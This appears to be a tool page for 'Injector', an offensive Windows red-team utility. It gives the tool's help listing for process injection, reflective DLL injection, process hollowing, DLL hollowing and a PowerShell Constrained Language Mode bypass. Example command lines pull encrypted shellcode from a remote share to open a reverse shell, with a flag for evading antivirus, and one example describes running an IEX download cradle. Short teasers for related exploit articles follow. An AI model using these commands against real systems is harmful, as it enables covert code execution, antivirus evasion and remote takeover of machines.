Injector is a Complete Arsenal of Memory injection and other techniques for red-teaming in Windows.
What Does Injector Do?
C:\Users\admin>Injector.exe
Help Options for Xenon:
-m Mode of operation
-m 1 Specifies the mode as Process injection
-m 2 Specifies the mode as Reflective DLL Injection
-m 3 Specifies the mode as Process Hollowing
-m 4 No injection! Give me my damn shell
-m 5 Powershell session via CLM bypass
-m 6 DLL hollowing
-TempFile File location that your current user can read
-shellcode Use shellcode
-dll Use dll
-decrypt-xor Specify Xor decryption for shellcode
-pass Specifty the password for Xor decryption
-decrypt-aes Specify aes decryption for shellcode
-pass Specifty the password for aes decryption
-location Specify the location i.e either server or local
-bypass Uses enhance attempts to bypass AV
To generate encrypted shellcode, use Helper.exe on kali along with proper switch.
Example of usage
Injector.exe -m=1 -shellcode -encrypt-aes -pass=password -location=”\192.x.x.x\share\shellcode.txt” -bypass
This is will decrypt your shellcode and give you reverse shell. Presence of bypass flag instructs injector to use some other ways to get reverse shell i.e using some undocumented Win API.
In case you dont wanna use encrypted shellcode, you can also run it simply like below
Injector.exe -m=1 -shellcode -location=”\192.x.x.x\share\shellcode.txt”
Just change the -m=1 to 2,3,4,6 to run other modes.
Injector.exe -m=5 -TempFile=C:\Users\user\sample.txt
This will give you a session where you can execute IEX cradle and get a proper reverse shell hence bypassing CLM.
Cybersecurity tools play a critical role in safeguarding digital assets, systems, and networks from malicious…
MODeflattener is a specialized tool designed to reverse OLLVM's control flow flattening obfuscation through static…
"My Awesome List" is a curated collection of tools, libraries, and resources spanning various domains…
CVE-2018-17463, a type confusion vulnerability in Chrome’s V8 JavaScript engine, allowed attackers to execute arbitrary…
The blog post "Chrome Browser Exploitation, Part 1: Introduction to V8 and JavaScript Internals" provides…
The exploitation of CVE-2018-17463, a type confusion vulnerability in Chrome’s V8 JavaScript engine, relies on…